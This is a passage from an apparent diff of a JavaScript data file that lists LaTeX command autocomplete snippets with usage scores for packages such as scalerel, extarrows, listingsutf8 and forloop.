scalerel: [ + { + caption: '\\scaleto{}{}', + snippet: '\\scaleto{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.00027615383978106523, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'scalerel-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'scalerel-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'scalerel-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'scalerel-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'scalerel-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'scalerel-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'scalerel-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'scalerel-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'scalerel-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'scalerel-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'scalerel-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 
'scalerel-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'scalerel-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'scalerel-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'scalerel-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'scalerel-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'scalerel-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'scalerel-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'scalerel-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'scalerel-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'scalerel-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'scalerel-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'scalerel-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'scalerel-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'scalerel-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'scalerel-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'scalerel-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'scalerel-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'scalerel-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'scalerel-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'scalerel-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'scalerel-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'scalerel-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'scalerel-cmd', + score: 4.002553629215439e-5, + 
}, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'scalerel-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'scalerel-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'scalerel-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + ], + extarrows: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'extarrows-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'extarrows-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'extarrows-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'extarrows-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'extarrows-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'extarrows-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'extarrows-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'extarrows-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'extarrows-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'extarrows-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'extarrows-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'extarrows-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'extarrows-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'extarrows-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'extarrows-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'extarrows-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'extarrows-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'extarrows-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'extarrows-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'extarrows-cmd', + score: 
0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'extarrows-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'extarrows-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'extarrows-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'extarrows-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'extarrows-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'extarrows-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'extarrows-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'extarrows-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'extarrows-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'extarrows-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'extarrows-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'extarrows-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'extarrows-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'extarrows-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'extarrows-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'extarrows-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'extarrows-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'extarrows-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'extarrows-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'extarrows-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'extarrows-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'extarrows-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'extarrows-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'extarrows-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'extarrows-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: 
'\\arraystretch{$1}', + meta: 'extarrows-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'extarrows-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'extarrows-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'extarrows-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'extarrows-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'extarrows-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'extarrows-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'extarrows-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'extarrows-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'extarrows-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'extarrows-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'extarrows-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'extarrows-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'extarrows-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'extarrows-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'extarrows-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'extarrows-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'extarrows-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'extarrows-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'extarrows-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'extarrows-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'extarrows-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'extarrows-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'extarrows-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'extarrows-cmd', + score: 1.897791904799601, + }, + { + caption: 
'\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'extarrows-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'extarrows-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'extarrows-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'extarrows-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'extarrows-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'extarrows-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'extarrows-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'extarrows-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'extarrows-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'extarrows-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'extarrows-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'extarrows-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'extarrows-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'extarrows-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'extarrows-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'extarrows-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'extarrows-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'extarrows-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'extarrows-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'extarrows-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'extarrows-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'extarrows-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'extarrows-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'extarrows-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'extarrows-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'extarrows-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'extarrows-cmd', + score: 
0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'extarrows-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'extarrows-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'extarrows-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'extarrows-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'extarrows-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'extarrows-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'extarrows-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'extarrows-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'extarrows-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'extarrows-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'extarrows-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'extarrows-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'extarrows-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'extarrows-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'extarrows-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'extarrows-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'extarrows-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'extarrows-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'extarrows-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'extarrows-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'extarrows-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'extarrows-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'extarrows-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'extarrows-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'extarrows-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'extarrows-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'extarrows-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'extarrows-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'extarrows-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'extarrows-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'extarrows-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'extarrows-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: 
'\\tanh{$1}', + meta: 'extarrows-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'extarrows-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'extarrows-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'extarrows-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'extarrows-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'extarrows-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'extarrows-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'extarrows-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'extarrows-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'extarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'extarrows-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'extarrows-cmd', + score: 0.0063276692758974925, + }, + ], + listingsutf8: [ + { + caption: '\\vskip', + snippet: '\\vskip', + meta: 'listingsutf8-cmd', + score: 0.05143052892347224, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'listingsutf8-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'listingsutf8-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'listingsutf8-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\thelstlisting', + snippet: '\\thelstlisting', + meta: 'listingsutf8-cmd', + score: 0.00012774128088872144, + }, + { + caption: '\\lstinputlisting[]{}', + snippet: '\\lstinputlisting[$1]{$2}', + meta: 'listingsutf8-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\lstinputlisting{}', + snippet: '\\lstinputlisting{$1}', + meta: 'listingsutf8-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'listingsutf8-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'listingsutf8-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\lstinline', + snippet: '\\lstinline', + meta: 'listingsutf8-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstinline{}', + snippet: '\\lstinline{$1}', + meta: 'listingsutf8-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstlistoflistings', + snippet: '\\lstlistoflistings', + meta: 'listingsutf8-cmd', + score: 0.005279080363360602, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'listingsutf8-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'listingsutf8-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'listingsutf8-cmd', + score: 0.00037306820619479756, + }, + ], + forloop: [ + { + caption: '\\forloop{}{}{}{}', + snippet: 
'\\forloop{$1}{$2}{$3}{$4}', + meta: 'forloop-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'forloop-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'forloop-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'forloop-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'forloop-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'forloop-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'forloop-cmd', + score: 0.0018957469739775527, + }, + ], + xymtex: [ + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'xymtex-cmd', 